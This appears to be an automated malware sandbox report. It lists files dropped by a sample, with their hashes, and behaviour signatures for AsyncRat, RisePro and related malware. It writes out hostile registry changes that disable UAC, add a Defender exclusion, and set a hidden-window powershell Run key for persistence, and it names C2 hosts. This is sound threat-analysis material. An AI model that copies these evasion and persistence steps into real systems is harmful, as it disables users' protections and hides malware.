SHA1 381fd797d250baba2d49724843a475e7b13f9ba5
SHA256 871352624fdb3dbfc502f6330fad63b51068f5bfe806dee2be4f2206580ef08d
SHA512 b9804ab2257f88fb90a845a1bc8e5c5335327318de42245fccc18cf6a1eb80d7c3eab646e272ecda85bfc47eba8c8359f509c0f94021ee51634dc44e2f1700b7

C:\Users\Admin\Desktop\a\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

C:\Users\Admin\Documents\SimpleAdobe\ZT0trHfwMfoxj5Giy8tYENXy.exe

MD5 ba6d3945e890984fdd036c9ef1674dfe
SHA1 b28d7cadac915edaf9a16528f845f9fac2cff28b
SHA256 69467ad1fa847ff055ab7c8fb1f357ec5dd64526797dd314f673a3544b1c3354
SHA512 a533cf50abd34bbac67f728d9a07eeda55d196361bca381649b6d9a584f9add509dad3fdb24f1d57e25b00fb6526d239c306d2529d7cb2e971777f08cf715f9a

memory/6460-32949-0x0000000000D80000-0x0000000000DD2000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\QQm6sx_yddwRBb9dOYrDJLGI.exe

MD5 5f7324abc929cdf64e87149e4a8768eb
SHA1 932c1e1901fb28eefd389d7abbee7b90d8f28f02
SHA256 1c3aaf613bc3dd19508feb217795453863c6ad704336d4f598a7b3f245498c42
SHA512 6a8ec8ae6e0f1cf07f91df82234441ada0c099e2fa80ba2edce550364848c3597659c03828793e1607fc0f12c370c5fc97b08442aec2a027274b9de5b3dd7581

C:\Users\Admin\Documents\SimpleAdobe\r85qaXlqlPjESenqkcFUOYUi.exe

MD5 64e769e16f853835dd768a9b65626407
SHA1 87c0e29f2335809e3e70aaee47187db3ee8ceece
SHA256 5ece0d233ac404577a0ae14c8195299d239e4bbf3cb004b56cdeddf77de94733
SHA512 f275730523bbf75d6f96bef1255be756fd84ae570d0d5aae7f29a513da15b2d7f9b1b057912accb15be5de27e80067b2e83a07b4e78968cb412c2f0ffdd35879

C:\Users\Admin\Documents\SimpleAdobe\pbNR6iJSLR7ZNijuyU4PPgRH.exe

MD5 1b63f1085ee2abb7d4b8ab386b4f2bba
SHA1 02b243a47d25a376cae5d7564fb52fefaa84aba9
SHA256 f4b290d41975dcca1d451352645fbeef8390270c7af6b16a7da5f83203f13f06
SHA512 6a1dad9ea2ed6ca5cc8cdda7c6575f6b1fdc9ab225d6e6c8bcf222890504e2d5264e48d7ba52ec8dc677280a310fdc29fa75c3614e2ed68d6bf121cca160a23d

C:\Users\Admin\Documents\SimpleAdobe\1UgQG_toWzOoZeguQ02B_gvY.exe

MD5 91d78228ce5bab0d9cccd048c5a207fb
SHA1 5bcff410dd33f87ffbf75e2da7848832651fe7bc
SHA256 9f48cbee619b085895a7a374806130fa7b352a8fdae34a3d6218fc7a6358405e
SHA512 1442d5ebafc170649217a36ba2007c3102556015e55006c659d596c564f2daf7e1a9ae40e96aa82185c92f5ae4b8c3fc030174444750b6da6825422788937f15

memory/7924-33218-0x0000000000520000-0x0000000000AFB000-memory.dmp

memory/9156-33199-0x0000000000820000-0x0000000000E28000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\qOEbDyAd6EEX7LBwv4iy9Juq.exe

MD5 50040aa4fcdf183865b768db08f93fc8
SHA1 442c47025a646e3bfecfc30f1fd229c7d083881c
SHA256 7b7ee47232cb322c12e53f733bdef460eb8ea8b4e96faf1c2b48220e263b1e1d
SHA512 97f3b59e2fc0ce87a4c3dc4fbce49d8d1fca17337f198d5fb6886088d380bb7c2ac82d478e872a56b3ce17487725a5f8586f3868c9f6cde2b80e88a3a415c0f0

memory/7464-33446-0x00000000001A0000-0x0000000000661000-memory.dmp

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

MD5 148b2c38cf0726535d760a703f803c80
SHA1 107503ca149f547d4745fe9b9a3fbae03d60126c
SHA256 30a110aa704b2beebbe56ad92cc4910defd943360d6bc10113e7fc17f9c31e7d
SHA512 6b9c13d80fb24924604245f9046c28df75d009c6cd6f819ef2ac6e99a592acfc84473b4fcc6e2c1ccafd6001bb4a931a8ced6a968bd874e2ebf81cd8c714bdbd

C:\Users\Admin\Documents\SimpleAdobe\qJS0UoGX0gnwbl3uy7DDA_wd.exe

MD5 3fcae847546386892c6a0d04363a7e4c
SHA1 8bbfd2960be40aead5af444a560a0ae8b2847259
SHA256 d30f2e8e26f7ff70cb07b21b1b8496a1fdb16403e11de0e7ba842e36bca5c26b
SHA512 49cae3222f46b9ebfa1c465f7bbb6b13b8b8ca22eba78f918a92bc2fdf5215cab33a10db7f2ba97d3532cff74994303c76ec3f00da880ea2819203e43fae3a45

memory/8332-33560-0x0000000000420000-0x00000000004A8000-memory.dmp

memory/7464-33729-0x00000000001A0000-0x0000000000661000-memory.dmp

C:\Users\Admin\Desktop\a\gold.exe

MD5 0b7e08a8268a6d413a322ff62d389bf9
SHA1 e04b849cc01779fe256744ad31562aca833a82c1
SHA256 d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA512 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4

memory/8332-34020-0x0000000007960000-0x000000000797A000-memory.dmp

memory/4064-34173-0x0000000000B10000-0x0000000000FD1000-memory.dmp

C:\Users\Admin\Desktop\a\5.exe

MD5 58f255cdde1639cac205467621bfcb70
SHA1 a264da537956dc2afd5ff41da29eba5b00995c56
SHA256 fdb833e1ad31cac0889e0ade3b8f48df9a6b484f9877b03330caf755ef3982cc
SHA512 3dcbc26ab8cd25396a6618f6ac5c125bb14ba6e00414e58c3b9b75cd44fca44950ad15ae1e904039797cff311c79a3d12c12edd33e040d1f1c8f5408abb98c3c

C:\Users\Admin\Desktop\a\Newoff.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/4064-34689-0x0000000000B10000-0x0000000000FD1000-memory.dmp

C:\Users\Admin\Documents\SimpleAdobe\m7xcE61UtJIbnmp1rKRKw7tv.exe

MD5 d43ac79abe604caffefe6313617079a3
SHA1 b3587d3fa524761b207f812e11dd807062892335
SHA256 8b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399
SHA512 bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082

memory/3840-34988-0x0000000000AC0000-0x0000000000E78000-memory.dmp

memory/3840-35055-0x0000000005950000-0x0000000005B90000-memory.dmp

memory/3840-35109-0x0000000006CC0000-0x0000000006EE4000-memory.dmp

memory/3840-35143-0x0000000005090000-0x00000000050AC000-memory.dmp

memory/4696-35449-0x00000000064A0000-0x00000000064C2000-memory.dmp

memory/8332-35701-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/8332-35738-0x0000000006130000-0x000000000618A000-memory.dmp

memory/9156-37341-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FEHPE754\YBNA2NLU.txt

MD5 1207bc197a1ebd72a77f1a771cad9e52
SHA1 8ed121ff66d407150d7390b9276fe690dd213b27
SHA256 260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476
SHA512 d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\a31c5d3e-4d7c-4a79-87cc-b34b2b65585f.dmp

MD5 582e2eef0a0ca67ab89a8cc397aed777
SHA1 7500be434f0637cc177baa6688e2ba0850bead5a
SHA256 afcf6281ecb8780461d85fabd4b3da6e1b00a0ad03072bbb895007f6e9653813
SHA512 9b44030e22bb3bacb8ac75ae102239f0181e4c5f27e3256eeb2400ffab038b64414491fccaf600f51cbb058fd403ac5bc3ee7d15ad45749ac3342fdb61b5f168

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

MD5 dcc368463a550e032eea38ee9d7555c7
SHA1 30080f8e6b27fbf3136e8e0c960b1a64361c568d
SHA256 aea74d3ebef21ecdc2661de9dc5fa1ceb5d1280e038ac0f707c052731671c1ff
SHA512 db698586ce5bce418ed8603b532bd56d826ba3b184763289cb164215f780436eb72478be1ba98daea8ffabc610e591858daf7b7b6494d603b864ec4c5c1c2e18

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 23757ed07e48d44307286952c68ec805
SHA1 c592ce51e6b0a2ac953d578a02e9b92ca6927a82
SHA256 7ea39c8d61be992783d37ddec9447b4e68dcfbb7a373a5d8770ee6cb0604abca
SHA512 c2270da887f919318759872bffda13de30ad002aa0b1a8382fff0c9ed35e04e82b886b240a73257150a92cba2fa326d20302bf7c77e8c6e7d86d0e0e2bf7445c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\962635be-7541-416b-b736-784112672d14.dmp

MD5 cab40c778591e0d16f4a0fe7db4a196f
SHA1 ceb06e15c8216de166b77440ca0e412e7eae5a75
SHA256 e75ae32efa2f2173c402481acee1dc594b0d9848f01e67e6e4389a9de7733ee0
SHA512 653d2bd0d62ef6d0d11f78f6f2d20d9763c2b9984dc1df1c7ce516e821087bbe82a041da0a7140d7fe1cc6a5b8bbf98a2542ff39655c985edf3bb73e8339671c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d747ac4b-eee4-446f-a9fe-e4afa68505e5.dmp

MD5 5450c4817953a6ca83b47c0fbcff1240
SHA1 f8c77b365cf834a769e9d411d8de09e59ed8eee4
SHA256 1deb85bbf492217026993fa86c1159075fee1bb74989795db5f7a49f0edc105c
SHA512 d09993cb83eb403093bcc30852f0012a9254344aa6375c89ff91ae38706178a6e008cf8857f6844e5706ca3833232055c524b2a5905d1b27e27dd24fd28f6de6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 59ccf729073b75b6510f628699d140a1
SHA1 786fcc314a1a174bd80b10586bcceaf06806d98a
SHA256 7b2b8aa44ad55806629151b1a2f3628268898bfcba2ea82bb79359a888d4e34d
SHA512 d5753993125dd9f15bd3fe8a6d601560a6cad57a3a03b44731fbb4dbab5bd225e62bc3b2a639498d1e919a1087c72a3f1989a5f2112b7fcce37382e2bc4161d7

C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\__data__\config.txt

MD5 a105a47c98f80b8852960c96b87de57f
SHA1 564e75ca9dcf70541b6f89622f1728387b96571f
SHA256 6091181db52b0b2379c6d23966f50a0fc2109d2536f613f1235465774106e9f2
SHA512 50a62a5d9cf35833bd9162021cb29644cd455d725cd7b54b1cb1e364aa8b367aa233eba42fc976242ec538103344c8986c816e7e269aefe3873298ccc843e664

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 4bde8ffd446ee8be6d27378ca601fa3f
SHA1 d133ca6f3dcdbb8f93f746ab8c295529636e04c5
SHA256 e8422af58d4fe92d7519b5f99181fcf4c8a1e79538ba155f31d4e1ff840f2a6d
SHA512 f7ac25f537e14e26a95cfab2d2c648e6c68625598ea2c7371d3ac54f615305b32dfc19433cde0593d9a7c0672d79cffab6671b51a5b3678d10662f9585eb336e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b46c82f0-d048-41b6-86f7-3a7da1ae46bb.dmp

MD5 5b4bfadc73ae24f53533f3c9caebd270
SHA1 13ece8dd053ca241b76d856b60d0fa3028fc09c2
SHA256 512bdf6cd6a829b2ecd6ac34dc1e1310ae3f6b5e47b9f384ca8af87bb86a9eb2
SHA512 2af5bdeb15b6455c60db86d87a770c20afc30ce69b69d7bdf6a103317893e86fcfeb54fa8fde4c06afe235d25fecfc64b8b66559616941b2c462374b8b447419

C:\Users\Admin\AppData\Local\Temp\edge_shutdown_crash.txt

MD5 06d49632c9dc9bcb62aeaef99612ba6b
SHA1 e91fe173f59b063d620a934ce1a010f2b114c1f3
SHA256 e79e418e48623569d75e2a7b09ae88ed9b77b126a445b9ff9dc6989a08efa079
SHA512 849b2f3f63322343fddc5a3c8da8f07e4034ee4d5eb210a5ad9db9e33b6aec18dea81836a87f9226a4636c6c77893b0bd3408f6d1fe225bb0907c556a8111355

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 8dc775fcc7fc81710c5f26daf1901c71
SHA1 c9f32642bc6d7db706b126d48ce86e9134273f55
SHA256 f723c44c14936b8aad6f1bb388c0219a234e642cf52099c3da78bbf17569ccf4
SHA512 0f34e3fe566f1de14aa8f6d0a212f64dbed0308d9ab1d2caf4adef07ac102bbe411b972c1f37e31fc64e069d324ad8a1ba9859bed20709c2aff096dbed628f2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\11a849af-9d2e-46d1-a182-2bfac53a4f5a.dmp

MD5 9f6d7dc7e6b1fb0f9649775b95c4e07a
SHA1 6fc12d3f9473c375dd6cb2dd35e7eb99d2b1b634
SHA256 086c556d7a1cc521ec86d44248c373bb3d62529c41b2e8e94de53828f3cd35f9
SHA512 eba87c275ae4da13f236c592e84b2a06f1952d745a12b964afaad19c9cb08b69d6de00f0936497ef45fbb4465cb01e96fe52cdaca44b60068dca41cd9e27992e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 aaeee5f70ce2e30a401338086fb772a7
SHA1 5714eeda9ef60225da30d5fa151870ec273c9b7a
SHA256 5526a176c74d9c0c4ea21210e989855862642e67bbe5e5cbe874aa6f1179ffa9
SHA512 5a01672663374484e188305cc88fc81bb14cdf1931a5bbbdbe0184e72dddc71b9d392e18eb6044d3cd0e1061c9f71d42b8ee741795996910bda74a4c4eec7885

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ae019e6a-2237-437f-8cbf-796ab0acec8d.dmp

MD5 b4b576f2c481d1f22c4be62b2da04259
SHA1 67a0031e7fc767c7a9b3d8ca613eb3c7ea60079b
SHA256 cc2adb70df558d0da25b8f8b12c463c9b8f887a61889e72d59a6fe87b1718a26
SHA512 2cdd9af705e759482d8f926d8d4b8bf048f60d91ebee710ea07634522c6e799c0cb795eb2a223b789825f133f6cef27538866ba63d12ba23ef2a287527bb385a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\bc6ca965-50e3-4d44-9460-280cc8d57f7b.dmp

MD5 14aa8a7707873725da7f38273c2f1111
SHA1 14238edc21e4b8f7abfdcc5fb8c94a6ce1969b8b
SHA256 9225b3d331b76b44f26ea1820e7c2703a0eeecbc4981d94d13cb058da38c260a
SHA512 f0833f4f72f67e69758f27ea061f87252a16094dcc140f10d5e086f5b4ef226239882f717dbb8f0845a85b7ccc1709e5dda5444cbb184670064c00cbbee31458

C:\Users\Admin\AppData\Local\Temp\1717260008_00000000_base\360base.dll

MD5 b192f34d99421dc3207f2328ffe62bd0
SHA1 e4bbbba20d05515678922371ea787b39f064cd2c
SHA256 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73
SHA512 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0c5683f4-2db8-4245-9b86-05caf8cf8fea.dmp

MD5 ac1201a590c039da60c4a1647261c9e8
SHA1 57def3700aa75294057ee552f4e9bd635be3f88e
SHA256 2ebc46dce31e968817b03c65bdc3dee290198aa298665f8d10ad2455b0219988
SHA512 d6c88063c2dd76635634294d53ac6e851549f33f99c808d6561294e16ff492a63985b6b9d5b4298e4ed50207df71f864e7426a08d1e758e04ebf760d6cca6b34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 e6fc5c220a7549201da0526171e3eaa1
SHA1 8e25b308619170a158f52cb81669601281c2e0c7
SHA256 467beecf043bca873160f46b98aa7ed937fc5b319434299f8d1e9d700cba59a3
SHA512 13512ce31d25771a09f694469b50fd08e65f16a33a94903201aef2ca97f9f6a0f715c2ecdb6e589dfabe3d1c84486556152331a2b795b9b6bb55d7cf474f1bca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\62576b4e-8c08-4b65-bc1f-bbd70c7d43a5.dmp

MD5 86db55f6368b765c9de54aa21b780182
SHA1 3401d914de7b7eb5c2c329771fae24a757285347
SHA256 99452036e0bc681bde6c38c35cd12577deacfafe6dc5f00d67f7656af0d84469
SHA512 0348dca4f55c4dc38c4a0af3e4b5c9c8f6677ace44801248f24d27efd9d99b1fb9a9d21cb2af87877bd45398b241423f494df6d0c013d08c1696b250a0ac8913

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 9118dedfae4fcf8efc36aa9158754481
SHA1 7d1ad50d020fa4d0dee33446b497b337b08c0a0b
SHA256 583e5f2be28ca0737b5b550ad9fd180b6af6614c6c310366603ce1cc1cfc260c
SHA512 acd1864a77a6cfb1ca8bdaacbe302068e0a6c29bd774678c7bcf48c09ad5502a0f673bde4e6101517bc243e23861b1d275bc588c35be56544c8ea283d958dde0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 2b8a63d228567d690ae020eddd64779e
SHA1 1a67edc6ee65d718155b8f4cbc7c172cd6e9bf6f
SHA256 83b076b339a25a53b36a2e43e274885536b95d2e794fc10806d6f1f9b267fc81
SHA512 032ede76e63be796af5e94a0d3c2afa49df4e140aeaf9d9d4c65e169ec700bf8a5e4f8df2c4bd4219befb2808f95d74b404d985f9d136a5e4362f279f75d875a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8684c4e0-db23-44af-80c6-2ed2b510fff1.dmp

MD5 0230be06396b20bcaa0a2a5840844fd7
SHA1 b918ecaac28d62901e57c5131c88f099321ae40c
SHA256 3d5611c7ea160bf49f7f972dc760788d39bf11d8b851f51f0316224a52ef7764
SHA512 7b451f55e7e855c8bc96fcef578459c0fb012ff981864ef35b52833e027e9aacd9291dce930f5e781659e8efda38ec663e1588a2876283d2b0e882638f4e2bc0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 70b45eaabba392d71cfe0a6229021771
SHA1 5c4cfe138c9a3c207e9709374a4210f7b1039c74
SHA256 2a117ca1ce3afe8d4f79f665d65c372a37a355938d2187dd8ef96815ecd75beb
SHA512 8504253aa4a5448535dd5d6a07809396d2b6f9920648ef7b88291cbbee779459adf7ce0eca7535fa7b81c4f29cc512a65fad9072f43f254f173144c1eec88c53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9c572f74-fa5b-4714-ad0b-992871097001.dmp

MD5 97d1eea0fdf000e72ac1a53f263bc7ce
SHA1 022778b22cf3bfe1be6d50543eefa6ac8438a60e
SHA256 513947bac118c71c5ca2acda240320e971749725c47c7b241339925fd37f5343
SHA512 5af6bbb92a7ade69bdbd0badbfd5f5c1f01cb45e2442268429694a23cfa123dfe31d86246718ec0afd0ade7a0928a10540ed6be7d2c9b7daf1f97462b40c0613

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d39cd378-2e9d-40c3-829b-10dbc70ae7ba.dmp

MD5 272134cd5794aca913fcd0aa0f11432b
SHA1 b74835bc19d3025e0c25e949da26db65fae379d1
SHA256 6f44f0eccb0b6d1a83cbd398252afaf7ff4bd3fdb936938523f99c53cdcaa54b
SHA512 873b9a04c6b0fce7bdffab076db7f708b547ea7adc930805a512ab469eea9a30a880e589a64d6eaae9ff11401eb82a05c3170a6eed4062addc3d96447642325f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\watson_metadata

MD5 50c3824a5ce311fb8de489d2c906722b
SHA1 646701304da4d5055030dea7c4db4166ea8b125b
SHA256 ec26cd69fafae4bfd96c6bc6f92b65dcb83d6434cdddd77cdcf1d33d9f1f3c3d
SHA512 32e1e36bb4313995c880eaf6344717898417809f1b1ee7b95612157bfb7aee2c223dcc28a3c37e4460e42703b21c4804faecfb8a0b8da4013a4f1a53f7d1665b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 018d785f203acfd90f73467bb56b535f
SHA1 182cd16fd122fc520dcd92fd77b14acc42e620ab
SHA256 2d39371ce46c3daacf146ecc00b9348c620f21002d729048f53f6b3a1c67e1a9
SHA512 7cef83a5ceb9cc276b49bacf3e52b93dcda717a18588f13435931b1374893542d0157b8735c0ffcdee02e74c1d73150f7f41d0e55a1925ad1fcb51dd0b3691c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\968cba5e-556a-45e9-afbe-c33e1877f79e.dmp

MD5 1eccdc25907111a2f957581b2ecba0b9
SHA1 ac95bbcd7c8f80b961ebe5b9a5c6ae0c6fb350db
SHA256 f13d138a4492b54358c1678ba4e0327e05248cf0b0bf5e27aba931dcd57f8bf3
SHA512 722c63667afe0d85bf18dbef89b92771b315368f1bf969ddedd1788c99c1a3efe90c87106936a453ca54e121240985135eb75b6c7488eca8d76293466ad53209

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\50b43453-f262-471a-96c6-9c9f4e273331.dmp

MD5 4a4d948c7e58b8ab44ec3c8185d6b9f4
SHA1 581e7b21b8bcd3f8727f33bf2aed152e98957eec
SHA256 2ae2be26fe6b4e9698420ac43d741b096f2a06c8b1f45b013f9b7bab68c6733c
SHA512 c0df4c9336811299a5416af16b9336f383e488727a36897cb1b6008173095c69b344b92a89efc61be6e8865aeff99e8a400330375a979a57e3ae62a6d6140cd2

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 15:54

Reported

2024-06-01 16:36

Platform

win10v2004-20240508-en

Max time kernel

102s

Max time network

106s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

Signatures

AsyncRat

rat asyncrat

RisePro

stealer risepro

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\a\New.exe = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" ..." C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\volumeinfo.exe'\"" C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
